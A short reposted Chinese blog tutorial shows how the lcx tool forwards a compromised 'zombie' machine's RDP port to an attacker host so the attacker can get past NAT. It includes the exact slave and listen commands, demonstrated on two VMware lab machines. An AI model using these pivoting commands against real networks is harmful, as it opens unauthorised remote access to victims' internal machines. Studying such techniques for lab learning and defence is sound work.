天天看點

網絡安全系列之二 lcx端口轉發實作内網突破

内網中的主機一般都是使用私有IP,在網絡出口處經過NAT轉換為公網IP之後,才能通路Internet。在這種網絡結構下,通信雙方之間實作的是單向通路,即隻有内網中的主機可以主動通路Internet中的主機,反之則不行。如果在内網中架設了一台伺服器,又需要允許Internet中的使用者通路這台伺服器,那麼就必須在網絡出口處進行端口映射。

Lcx可以實作端口轉發,将殭屍電腦A上的某個端口(如3389)轉發到具有公網位址的主機B上,這樣黑客隻需連接配接主機B的3389端口就相當于連接配接到了殭屍電腦A上,進而突破了内網私有IP的限制。

下面在vmware中利用2台虛拟機來模拟操作,一台虛拟機作為黑客主機(IP位址192.168.80.128),另一台虛拟機作為殭屍電腦(IP位址192.168.80.129)。

首先将lcx分别放到這兩台虛拟機的C槽根目錄下,首先在殭屍電腦上執行指令“lcx –slave 192.168.80.128 5000 192.168.80.129 3389”,也就是将192.168.80.129上的3389端口轉發到192.168.80.128上的5000端口。

然後再到黑客主機上執行指令“lcx –listen 5000 3389”,也就是在5000端口上監聽,并将收到的資料轉發到自己的3389端口上。此時在黑客主機上執行“netstat –an”指令,可以看到同時開放了5000和3389兩個端口。

最後在黑客主機上打開mstsc,隻需輸入自己的IP位址(192.168.80.128或是127.0.0.1)便可以連接配接到殭屍電腦上了,進而實作内網突破。

本文轉自 yttitan 51CTO部落格,原文連結:http://blog.51cto.com/yttitan/1560228

繼續閱讀